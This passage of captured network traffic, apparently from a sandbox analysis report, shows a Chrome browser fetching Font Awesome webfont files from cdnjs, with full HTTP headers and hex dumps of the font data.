                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: font
                                                                            Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:45 UTC979INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:45 GMT
                                                                            Content-Type: application/octet-stream; charset=utf-8
                                                                            Content-Length: 156532
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: "656632a7-26374"
                                                                            Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 314922
                                                                            Expires: Sat, 18 Oct 2025 08:36:45 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KfGVRpN6O7Hf96v2u2kAS9gFb3AkyDGczJYXQl4%2FAtqLmcCjELXNCQkmj%2BfzA59wXYhsXMpuAeUzqbdzSNikVzalvTTfIWPvl%2B2R%2FuCvOGVeOV6em4GuFX8jM0P1tt0BxxTypAkJ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d99999938fa0c34-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:45 UTC390INData Raw: 77 4f 46 32 00 01 00 00 00 02 63 74 00 0a 00 00 00 06 1a 41 00 02 63 28 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 ab 3c 00 81 91 02 ca 96 c2 5c cb ab 40 05 87 6d 07 20 25 20 0d 93 95 01 50 58 9d 00 00 e8 fa 36 1e 46 a4 68 f6 f0 14 91 b3 5e 0f 80 aa aa aa aa aa 66 25 04 1c d7 b6 bd aa 2a 00 08 7e f4 93 9f fd e2 57 bf f9 dd 1f fe f4 17 7f f5 37 7f f7 0f ff f4 2f ff f6 1f ff f5 3f ff f7 9f 02 83 71 f7 0f 84 69 d9 8e cb ed f1 fa fc 86 ff 68 bf d7 73 27 40 b4 49 0a c2 f3 44 95 15 ca 56 d5 46 d8 29 28 56 b2 8a 60 fd 37 aa 42 07 df a7 f1 1f 75 e9 b3 ec 0b 00 4a a7 f3 fb 49 19 55 9c 80 39 45 de 11 60 4d b7 8e cd 5a 66 95 d1 c8 ff a9 98 52 0e 26 9a 74 26 26 d2 6a 8b 8a f9 cb 2d a2 95 24 d3 17 c0 22 3b a8 3a
                                                                            Data Ascii: wOF2ctAc(6$ `<\@m % PX6Fh^f%*~W7/?qihs'@IDVF)(V`7BuJIU9E`MZfR&t&&j-$";:
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 81 03 5e 20 c5 8d 55 c2 bf 25 8a 17 e1 93 b8 a8 45 20 f7 7f 09 70 7a 26 f8 13 4d ad be 5e 35 54 57 77 41 63 95 64 d9 96 ac b6 ba 1d 43 ac b2 a4 ee 84 95 8c e7 36 59 cc cd 12 79 89 b3 9c 65 dd 0c 2f 66 8e 50 0b c4 3a e2 1c b1 76 f7 00 ff 5f 42 e9 88 b4 d4 ba 7a 42 4f 4f cf f4 84 84 b0 00 06 98 05 66 37 63 76 16 98 bd db 3b de 5c de cb 60 3a ee 31 88 20 8f 62 48 5a 89 e2 91 22 45 11 54 24 45 85 35 69 45 cb 14 14 79 14 65 f9 94 29 d1 22 a1 10 6d cb f7 a6 43 7a 7b 9d f2 59 72 90 1c b0 ff 3f 69 6a fd bb af c2 ab 57 e1 55 48 08 0d a0 80 02 50 40 77 a3 1b d5 68 a0 3a b0 c9 22 d9 14 49 2b b0 ad 44 52 92 2d 28 51 94 e5 00 af 34 72 a0 03 e4 28 c9 bb 52 3b 48 43 67 38 d3 61 77 7b c6 49 b6 bc 63 38 c5 c3 99 2c 7b f7 7f 4c 96 35 89 93 82 aa 8f c8 52 ad ab 67 ba 7b ba
                                                                            Data Ascii: ^ U%E pz&M^5TWwAcdC6Yye/fP:v_BzBOOf7cv;\`:1 bHZ"ET$E5iEye)"mCz{Yr?ijWUHP@wh:"I+DR-(Q4r(R;HCg8aw{Ic8,{L5Rg{
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: f8 bd b6 e6 f6 fb a4 c1 88 e9 33 59 ee 8b 7f cf 02 d3 43 9f b9 c6 d3 ca 8e d9 e7 d7 2d 3f 23 1b 04 ff aa 75 23 bb fa 69 5c 0b cf 77 f5 69 69 7c 4b c9 8e d6 75 ee 1c 67 63 5f 25 fa a9 be d9 e8 3e 35 3e cb ac d9 b3 c0 54 d9 b6 1c b3 d8 37 c1 33 02 7b 3f 13 ae c8 b7 75 89 75 b6 a5 ab ee 87 19 53 a6 8f ea d1 dd 9b 33 bd ef 8b c3 06 fc 41 e5 d1 b5 05 c8 91 77 bf b7 ca 19 18 6a 41 bc 07 23 b9 b3 64 ce 9d 85 ac 8e 06 dd 2c 8f 9f 9c ec ca 6d 7e b7 1a e7 69 03 bd d6 c0 0f 93 67 2a 98 36 5b 3d de 45 aa d9 e4 77 44 ff 52 ce a2 f6 b3 b7 a7 5d e6 eb 59 9b ab 26 f5 9e e1 d0 65 6b 78 71 6d 94 fa 52 f8 7b 3b e6 e3 71 52 a7 cc 87 96 ab a9 6f 23 be fd 59 d5 3c f6 fe 33 3e 49 cd 2b e5 5b 8f 13 6a 6a fc 5c a8 9a cd 79 34 03 b7 7f 81 e3 a0 47 2b 78 c5 ba 0d 9c c5 d7 9c f6 3e
                                                                            Data Ascii: 3YC-?#u#i\wii|Kugc_%>5>T73{?uuS3AwjA#d,m~ig*6[=EwDR]Y&ekxqmR{;qRo#Y<3>I+[jj\y4G+x>
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: ed 0f fb d3 fe b6 ff 62 77 c2 fd e1 d5 b0 3a 7c 16 fe 0e ff 10 f4 e8 33 60 26 73 59 4a cd 28 2d 43 d6 62 1d d6 63 7d b6 60 4b b6 a7 63 47 0e e1 50 0e e3 70 8e e0 48 8e e7 04 56 71 31 97 70 39 57 72 15 57 73 0d d7 72 1d 37 71 2b 77 70 17 f7 f3 00 0f f2 10 0f f3 08 8f f2 18 8f f3 04 4f f2 14 2f f2 0e ef f2 31 9f f0 29 5f f0 25 5f f1 3b 7f f1 af 40 94 04 12 91 44 49 92 64 49 91 74 c9 94 2c c9 96 1c c9 95 3c 29 15 23 0d a5 b3 74 95 6e d2 43 fa 4a 3f e9 2f 03 65 9c 6c 91 ad b2 ad b2 49 65 d3 da a9 b5 8b 6b 97 d4 8e d5 ee 55 13 57 83 87 e8 26 8e 29 6d 06 98 09 66 91 59 62 36 9b 6d 66 9f 39 68 8e 9a 9b e6 91 79 69 9c e4 96 62 52 4a ea 48 5b e9 2c dd 65 a8 8c 97 99 b2 54 36 c9 2e 39 26 e7 e4 92 dc 95 fb f2 50 3e ca 17 f9 2e ff 6d 64 9b c6 66 b7 c5 ed 64 bb cc 1e
                                                                            Data Ascii: bw:|3`&sYJ(-Cbc}`KcGPpHVq1p9WrWsr7q+wpO/1)_%_;@DIdIt,<)#tnCJ?/elIekUW&)mfYb6mf9hyibRJH[,eT6.9&P>.mdfd
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 39 05 e7 e7 02 5c 84 8b 72 49 2e c5 55 b8 2a 2f e3 4d bc 9d f7 f2 31 3e c9 67 f9 12 df e2 07 fc 98 a9 1f e7 16 79 ec d9 25 8f 14 94 52 52 6e 55 cd a4 b5 74 90 ae d2 5d fa b0 a1 d1 32 4e 26 c9 14 99 25 2b 65 b5 6c 66 fc e4 dc ae 6d f5 41 42 b6 fc 29 6a 6f f2 1f f1 90 10 c9 e7 cc 8d 7c 28 88 72 5f a6 09 5a a2 2d 3a a2 0f fa 61 10 86 62 3c 26 63 1a 66 62 3e 96 b1 f1 9b b0 15 db b1 07 07 70 02 67 70 01 97 70 15 d7 71 07 f7 d9 ea 15 02 3d b3 5b b8 8b ea 62 f4 13 b9 a4 2e c5 bc f1 50 bc 3f f5 e7 ec 9f f3 e6 72 fc ef 6a fe 7f f8 ff 83 ff ef fc 7f e3 ff 6b f8 63 13 a6 40 e9 02 45 0b 14 8c df e2 fd 78 31 1e 8f c7 e2 8e b8 2d 6e 8d 9b e3 06 20 2e 8c b3 e3 8c 58 29 96 8e 25 62 9e 98 2e a6 f4 ff fd b3 bf f6 47 7e c3 cf f8 69 3f e0 3b 7d 9b 6f f2 8d be c1 57 f8 62 5f
                                                                            Data Ascii: 9\rI.U*/M1>gy%RRnUt]2N&%+elfmAB)jo|(r_Z-:ab<&cfb>pgppq=[b.P?rjkc@Ex1-n .X)%b.G~i?;}oWb_
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 73 8c cb b4 11 80 0d 0b b3 00 e3 43 7b f1 70 cf 22 0c 69 bf 79 6f 57 77 e9 2e 1c f2 43 a6 3f 5b 5a 83 b3 6a 52 78 3a 5a 87 7a 1c ff c4 b4 e3 c0 8e 01 3b 04 6c 2f 3c 4a df c3 15 dc 41 69 f5 e4 af 6b 43 38 89 8c 1a 34 a6 09 4d 69 46 73 5a d0 92 56 b4 a6 0d 6d 69 47 7b 3a d0 91 12 65 aa c8 a9 a6 42 50 d0 89 ce 74 a1 2b dd e8 4e 0f 7a 72 2d f7 d8 e5 76 85 5d 69 d7 d9 f5 76 93 dd 62 b7 da 5d 76 9f 3d 61 4f da 53 f6 96 bd 6f 1f d8 87 f6 91 7d 6c 9f d8 a7 f6 b9 7d 61 5f da 37 f6 ad 7d 67 3f d9 cf f6 8b fd 6a 7f da 0c 9b 63 8b 6c b1 ad b2 d5 42 35 d5 5c 2d d5 56 b9 ba ab 87 7a a9 bf 06 68 a0 86 6a b8 c6 6a 9c c6 6b 92 26 6b 8a a6 6a 5b 6d a7 1d b4 93 76 d5 b1 3a 59 a7 ea 0c 9d ad 0b 74 a1 2e d2 c5 ba 44 97 ea 32 5d ae eb 74 bd 6e d3 ed ba 57 8f e8 49 bd a9 77 f4
                                                                            Data Ascii: sC{p"iyoWw.C?[ZjRx:Zz;l/<JAikC84MiFsZVmiG{:eBPt+Nzr-v]ivb]v=aOSo}l}a_7}g?jclB5\-Vzhjjk&kj[mv:Yt.D2]tnWIw
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 4b 08 3b 50 af 05 3b 52 6f 0d 3b 51 ef 08 3b 53 ef 0a bb 50 1f bc 1c bb 52 1f 43 7d 6c ff ab ae 4f 77 39 f6 a0 be 88 fa e2 3e 57 5d df 20 ec 4d 7d 07 ec 43 fd 08 ec 4b fd 0c ec 47 fd 02 ec 4f fd 36 1c 40 fd 2e 1c 48 fd 3e 1c 44 fd 3d 1c 4c fd 33 1c 42 fd 1b 1c 4a fd 1f 1c 46 6f f0 08 0e a7 37 15 bd a9 71 04 bd 59 81 a3 e8 2d 0a 47 d3 3b 11 8e a1 77 09 1c 4b ef 7e 38 8e de c3 70 3c bd 67 e1 04 7a 2f 8d e0 44 7a af d2 7b 0d 27 d1 fb 02 38 85 de b7 70 2a 7d 93 c3 69 f4 dd 3e 82 d3 e9 bb 93 be bb 70 06 7d bf 02 67 d1 2c 02 67 d3 2c 3b 82 73 68 96 a7 59 01 e7 d2 ec 02 9c 4f b3 f7 57 74 01 cd 7e 34 fb e3 42 9a 83 68 0e c6 c5 34 67 00 97 d2 9c 03 97 d1 5c fb 15 5d 4e 73 03 cd ad b8 82 e6 76 9a 3b 70 1d cd dd 2c c7 0d 34 f7 d2 bc d2 cf fd 89 9a d7 68 3e c3 93 34
                                                                            Data Ascii: K;P;Ro;Q;SPRC}lOw9>W] M}CKGO6@.H>D=L3BJFo7qY-G;wK~8p<gz/Dz{'8p*}i>p}g,g,;shYOWt~4Bh4g\]Nsv;p,4h>4
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: fa 07 79 d9 e8 25 b1 36 65 d3 88 58 87 b2 39 65 0b 62 5d ca 61 48 37 37 e5 f0 88 6e 1e ca d1 94 63 88 f5 29 a7 22 b1 21 e5 aa 82 d8 88 f2 30 e5 91 f1 58 5e 1e 53 62 53 ca 53 12 9b 51 9e 8b 88 cd 29 2f 51 5e 21 b6 a0 bc 86 c4 d6 94 8f 24 b6 a1 7c 2a b1 2d e5 2b 89 ed 28 3f 45 c4 f6 94 bf 28 7f 13 3b 50 fe 45 fa 33 29 ff 4b ec 44 1d 24 b1 33 75 54 89 5d a8 93 4b ec 4a 9d 52 62 37 ea 54 05 31 15 75 76 ea 9c 4f e7 f2 3a b7 05 b1 17 75 3e ea fc cf e0 f2 ba a0 12 fb 52 17 91 d8 8f ba 98 c4 fe d4 25 24 0e a0 2e 25 71 20 75 19 89 83 a8 2b 48 1c 4c 5d 59 e2 10 ea aa 12 87 52 d7 90 38 8c ba 6e 41 1c 4e dd 90 ba d1 b8 37 af 9b 18 11 47 51 37 a3 6e 4e 1c 4d dd 9a 92 71 2c 75 5b ea 4e c4 71 d4 5d a9 bb 13 a7 50 f7 24 22 4e a7 ee 43 dd 8f 38 83 7a 10 05 dd 42 d4 83 a9
                                                                            Data Ascii: y%6eX9eb]aH77nc)"!0X^SbSSQ)/Q^!$|*-+(?E(;PE3)KD$3uT]KJRb7T1uvO:u>R%$.%q u+HL]YR8nAN7GQ7nNMq,u[Nq]P$"NC8zB
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: d4 26 e6 7c 14 1a 13 db 11 85 16 c4 65 14 5a 12 57 a0 d0 9a 78 8f 42 1b e2 4b a0 d0 9e f8 51 28 74 26 f6 01 14 ba 10 73 0b 0a 3d 88 1f 87 c2 58 a2 7f 50 98 40 dc 01 14 26 7a 3c ac 92 f8 d1 28 ac 21 ae 1e 0a db 88 ed 87 c2 4e 62 1f 47 61 17 71 dd 50 38 9c e8 63 14 8e 20 e6 55 14 ce 24 e6 4a 14 ce 25 f6 3e 14 ce 27 76 09 0a 97 10 9d 84 c2 a5 c4 ec 40 e1 5a a2 cb 51 b8 8e d8 3f 51 b8 99 b8 f3 51 b8 83 d8 4f 51 b8 9b e8 58 14 1e 23 76 1b 0a 8f 13 33 0b 85 27 88 ef 8c c2 93 c4 7d 87 c2 d3 c4 cd 46 e1 19 a2 bf 50 78 8e d8 83 28 bc 40 dc 36 14 5e 26 e6 13 14 5e 23 f6 68 14 de 24 f6 28 14 de 22 ee 2b 14 de 21 6e 37 0a ef 13 77 39 0a 1f 12 77 3b 0a 9f 11 9d 8b c2 17 c4 5c 83 c2 d7 c4 f4 47 e1 3b e2 c6 a1 f0 23 71 06 85 48 74 19 0a 87 88 ae 45 d1 11 f7 3a 8a a5 88
                                                                            Data Ascii: &|eZWxBKQ(t&s=XP@&z<(!NbGaqP8c U$J%>'v@ZQ?QQOQX#v3'}FPx(@6^&^#h$("+!n7w9w;\G;#qHtE:
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: cc ef c8 8d 13 76 42 6e 92 f8 e3 68 f4 34 e2 9f 8b 46 4f 27 de 2c 34 7a 39 31 6f a0 d1 1b 89 f1 d1 e8 33 c4 ff 19 8d ae fd 4f 8a b9 98 12 4c b5 b5 5c 6d ca 44 24 6c c8 30 e4 79 90 d7 b3 9e b4 d1 d7 a8 67 41 9e d6 d3 9e 2c c8 fb 1a 7d 69 96 0f 34 f3 2c 6b e6 9b 67 b5 b4 96 f6 64 e5 a0 1c 6c 9e 0d d6 07 eb 3d 0b 5b ad 56 ab fe e4 93 4f b6 46 96 8f 8c 8c 8c 34 9e 7c f2 c9 91 d6 e4 0f 8a e2 44 9b 25 71 24 45 71 32 f9 55 12 47 9a 5d 14 45 31 f9 df ec a2 68 17 45 a1 ce a2 5d 14 dd 49 1c 49 51 9c 4c 1e 92 c4 91 14 c5 89 6e 03 f0 a6 fe 9d fa 8a 9d 75 1b 55 b6 80 e9 33 ea 59 36 d8 b7 45 50 ae f6 64 49 5a 6b 0c e5 cd e1 1e bf 99 37 eb 83 f5 72 50 4e 6b e9 c2 30 8c e3 30 0c c3 38 0e c3 cd d2 ce 4a a5 33 4d 3b 2b 95 ce 54 cb e3 30 0c c3 78 8a 38 0c c3 30 16 93 87 68
                                                                            Data Ascii: vBnh4FO',4z91o3OL\mD$l0ygA,}i4,kgdl=[VOF4|D%q$Eq2UG]E1hE]IIQLnuU3Y6EPdIZk7rPNk008J3M;+T0x80h


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.2.449786104.17.25.144431148C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:36:45 UTC653OUTGET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                                            Host: cdnjs.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            Origin: https://alinefrasca.sbs
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: font
                                                                            Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-10-28 08:36:45 UTC981INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:36:45 GMT
                                                                            Content-Type: application/octet-stream; charset=utf-8
                                                                            Content-Length: 116672
                                                                            Connection: close
                                                                            Access-Control-Allow-Origin: *
                                                                            Cache-Control: public, max-age=30672000
                                                                            ETag: "656632a7-1c7c0"
                                                                            Last-Modified: Tue, 28 Nov 2023 18:34:15 GMT
                                                                            cf-cdnjs-via: cfworker/kv
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Timing-Allow-Origin: *
                                                                            X-Content-Type-Options: nosniff
                                                                            CF-Cache-Status: HIT
                                                                            Age: 224943
                                                                            Expires: Sat, 18 Oct 2025 08:36:45 GMT
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WpwA61Iky%2BtHEyFzrZi0XUJNdtFJs7l5J1Q%2F1Utx683lok9tYXq4QFjdzN9%2FTmJJ3M6%2FpBhTigXoG%2BfO3OE2lMtcUXMl3CjFCDk80E9ISDDKXEp0YaLm7AScbcdFLztwb4B5HxhK"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                            Strict-Transport-Security: max-age=15780000
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d9999993c4d486f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-10-28 08:36:45 UTC388INData Raw: 77 4f 46 32 00 01 00 00 00 01 c7 c0 00 0a 00 00 00 03 0e 91 00 01 c7 73 03 05 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 36 02 24 04 20 06 60 03 90 48 00 a5 56 ca 8b cc 10 cb 90 4c 05 88 1d 07 20 25 48 87 71 6a 08 dd 30 3d 00 00 b4 fa 79 50 46 f4 a4 d5 e2 01 50 55 55 4f 09 61 5e db f6 2a 20 fc f4 cb 6f 7f fc e5 6f ff f8 d7 7f fe f7 97 81 b1 3b 20 96 ed b8 9e 6f f8 ff 7e bf d7 75 f6 7f 2f c0 ec 62 93 f6 96 59 d6 75 2a e3 4b b7 a0 aa be 90 11 32 aa 80 77 fc 1f 5f 09 e8 82 70 96 d8 b4 ac 9d e8 31 d1 6e 2f a2 ce 8b 98 d3 09 2f 46 92 a3 74 f6 e5 01 e4 4f ec 65 2e d2 89 3a 81 e8 d4 dd b9 c9 3f 01 9e a7 9c e6 fb ce c6 aa bc 96 42 b2 55 e0 80 0a 34 01 a9 84 47 22 bb 40 37 e0 1b 91 4a c0 49 f6 54 5a 42 9e 91 c7 cb ff 87 33 fd 9f 3b a0 11
                                                                            Data Ascii: wOF2s6$ `HVL %Hqj0=yPFPUUOa^* oo; o~u/bYu*K2w_p1n//FtOe.:?BU4G"@7JITZB3;
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: ee 5b 67 95 35 16 76 17 95 45 34 79 e0 81 1f 44 43 74 91 10 31 62 7c e2 2f 01 12 f2 95 e8 d7 24 c4 9d d8 bc ff 1f a7 e5 bf fb 24 bd 27 59 b2 08 6d d9 92 2c c9 b1 e3 c4 b2 ad c8 c1 81 74 93 81 cd 2c 36 8b 90 a5 4e 69 b6 e5 f9 29 21 66 97 e7 b4 b3 2d 4f 11 3e 20 27 3f cf cf 9a 7f cf d5 a7 92 bc 98 bc c9 4c 32 93 97 e4 e5 65 44 57 d9 65 97 15 63 59 d8 c5 a5 e2 f3 ff 87 2a d4 a9 d3 42 9d f6 0b fd 0a d5 2d 35 a3 d4 8c 2f 66 19 ff ff 69 9a de f7 ff cc ff 33 ac 61 69 24 db b2 25 5b 36 cb 80 4b f6 02 60 80 c0 61 07 78 83 ec b6 09 3b 05 4c d8 a7 71 4e 5d 76 79 0b ec 02 6f 43 08 ff cf f3 67 fe 3a bb 33 05 a7 f2 ad 94 49 95 0a 1c 64 a0 97 9f bc 5a fa 94 fc ef 7b 2b ad f6 40 02 65 46 56 f7 cc b4 d4 39 32 46 c8 75 81 a3 e5 56 69 db d7 39 f7 fd c5 7d ef 7f b3 79 df 3d
                                                                            Data Ascii: [g5vE4yDCt1b|/$$'Ym,t,6Ni)!f-O> '?L2eDWecY*B-5/fi3ai$%[6K`ax;LqN]vyoCg:3IdZ{+@eFV92FuVi9}y=
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: f2 40 21 a8 00 1d a1 07 f4 84 5e d0 1b fa 40 5f e8 07 fd 61 00 0c 84 41 30 18 86 c0 50 18 06 c3 61 04 8c 84 51 30 1a c6 c0 58 18 07 e3 61 02 4c cc 57 22 5f ab 7c ad f3 b5 c9 d7 2e df 6a cd 4f 8b d0 1c 5a 56 ad 81 d6 52 6b a7 cd d2 e6 39 ff 27 3e 4b aa 9e d4 3d e9 7d b2 92 5c 31 b9 61 f2 fa e4 8d c9 db 52 4a a4 0c 4f 39 92 72 57 0f d2 e3 f5 42 7a 31 bd 8a 5e c3 e8 67 0c 30 66 18 8b 8c 15 c6 46 e3 b5 e1 c4 08 cc 8f 05 b1 2c 56 c6 36 d8 11 fb e2 00 1c 88 43 71 04 8e c4 d1 38 15 a7 e3 2c 5c 8c ab 70 1d 6e c4 2d 78 00 cf e2 15 7c 84 6f f1 07 fe 45 13 d3 c8 4e 01 24 28 9a 8a 53 49 2a 47 55 a9 31 75 a5 1e 34 88 86 d2 70 9a 4a 33 68 01 ad a0 55 b4 9a d6 d3 46 da 43 07 e9 10 1d a1 53 74 8e ee d0 07 fa 42 1a 77 e6 31 3c 85 55 9e cd f3 78 29 af e5 0d bc 95 77 f1 09
                                                                            Data Ascii: @!^@_aA0PaQ0XaLW"_|.jOZVRk9'>K=}\1aRJO9rWBz1^g0fF,V6Cq8,\pn-x|oEN$(SI*GU1u4pJ3hUFCStBw1<Ux)w
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: b1 2a 0b df 99 63 35 16 2d 33 c7 ea 2c da 66 8e 35 58 f4 e9 1c 6b b2 b8 fd 1c 6b b1 78 d6 1c 6b b3 78 b5 39 d6 61 f1 a5 73 ac cb e2 cb e7 58 8f c5 d7 8c 61 7d 96 4c 60 c9 44 6c c0 92 7d 68 4c 1b b1 e4 0e 96 dc 85 8d 59 f2 12 4b 5e c6 69 dc a8 f0 18 b6 a0 d1 83 46 6f 6c 49 63 34 0d b1 2d 8d b1 34 c6 63 b8 ab 31 9b c6 dc a3 ab b1 0c 8d 65 f1 18 37 77 7e cc d1 86 e6 ae 43 b4 a6 79 2c cd e3 f0 19 37 cf e0 39 f6 a0 79 de 10 7b d2 bc 94 e6 e5 98 ec 6a be 47 f3 43 dc c5 cd 05 c7 1c 07 92 3a cf 71 10 69 c4 1c 5d 48 a3 be f2 a5 96 71 9a c6 43 1c 4c 9a 4d 9a 83 b5 38 6d c8 73 b4 24 6d 36 c7 61 a4 9d c6 08 b7 90 76 26 ed 8a c3 49 bb 11 ca e3 ef 4e da 0b 47 91 f6 21 ed 8b e3 48 fb f1 1e 3a 9e b4 3f e9 00 9c 40 3a 94 74 14 4e 22 1d 43 3a 16 67 90 4e a0 31 9c 45 3a 95
                                                                            Data Ascii: *c5-3,f5Xkkxkx9asXa}L`Dl}hLYK^iFolIc4-4c1e7w~Cy,79y{jGC:qi]HqCLM8ms$m6av&ING!H:?@:tN"C:gN1E:
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: 85 a1 9e ef 38 39 f7 cc 29 37 2f 29 15 4a ea 37 af 66 9d 7c a9 54 ba b5 74 ab d4 c3 27 c4 76 e4 c1 13 2e e7 50 a2 89 ec f8 6f 49 f5 b5 39 e1 72 13 57 5a 9e 8c c7 e3 f1 73 65 d3 b3 e7 53 d8 82 29 7a 35 42 7e 5f 69 1d 85 a1 ee 67 9b 3a d2 4a 47 2a e2 06 37 d2 54 27 dc f0 4a 16 29 a5 fb b8 11 7d 7d 6e f0 50 07 dc 88 bb 69 32 18 e8 cd 78 53 c7 5a eb 24 fd df 15 b6 4e 55 54 e4 be 7d a4 24 4d b5 d6 9b 75 ae 49 91 17 03 bd 55 e4 d9 c4 b5 2c 4c 60 53 72 13 13 c7 76 37 36 9b 0b 40 28 76 aa 9a 40 a4 aa 41 e4 0a c3 f0 2a b5 a0 ba aa ff 51 10 c0 af d5 43 c1 28 33 84 23 bd 30 2c eb 46 0d 63 42 ec 9a 26 51 b5 1a 44 52 72 e6 fb b5 40 59 96 0b 53 cb 72 97 c0 24 8e ed 4a ce b1 c9 a5 28 97 98 c1 4b 02 98 69 0a b7 de 68 2f fa be 6d 92 8e 6b 59 96 e5 c6 84 73 cb 10 42 0a ca
                                                                            Data Ascii: 89)7/)J7f|Tt'v.PoI9rWZseS)z5B~_ig:JG*7T'J)}}nPi2xSZ$NUT}$MuIU,L`Srv76@(v@A*QC(3#0,FcB&QDRr@YSr$J(Kih/mkYsB
                                                                            2024-10-28 08:36:45 UTC1369INData Raw: d3 d3 de fe ec e1 55 f1 bb f7 ff 0f 86 a0 94 71 21 c4 6c ea 01 78 30 12 42 70 78 8e 10 82 df 76 1b 17 42 08 4a d9 c4 f6 7d 7b c2 28 15 31 52 55 46 23 f8 14 8c 50 88 56 b2 b6 d3 77 22 51 27 b3 dc 7d 27 d4 d8 cd 5c e1 60 83 38 eb 6c 22 db 0c b7 e7 9b a6 7f c1 03 46 b5 66 30 ce a3 f7 8d 9a 38 c4 34 c3 29 ed a1 82 f6 78 e5 89 84 51 2a 80 cf 1e cb e2 1b 60 f4 e7 66 36 7d 7c 8c ca f3 3d d8 84 09 3a 84 2e c2 63 46 ff 38 d4 51 a0 27 96 12 a7 e2 7c 80 c8 ec 15 26 d2 6e f7 73 d9 31 70 b2 69 76 16 56 52 60 03 47 9d fd 0b a5 72 5b 27 43 d8 7c 52 92 04 8d b9 9b 76 fd 85 fa 26 94 d5 89 20 cd 46 65 61 a1 43 9b b4 14 e1 19 53 90 2b 3b 62 84 e6 53 8c 60 8a 4e a2 9b 10 02 16 b1 14 a9 48 a1 29 f8 f2 81 94 fc db b0 0e 32 0f 36 66 44 b3 33 c3 10 43 1e 21 49 93 54 25 3c 73 3d
                                                                            Data Ascii: Uq!lx0BpxvBJ}{(1RUF#PVw"Q'}'\`8l"Ff084)xQ*`f6}|=:.cF8Q'|&ns1pivVR`Gr['C|Rv& FeaCS+;bS`NH)26fD3C!IT%<s=
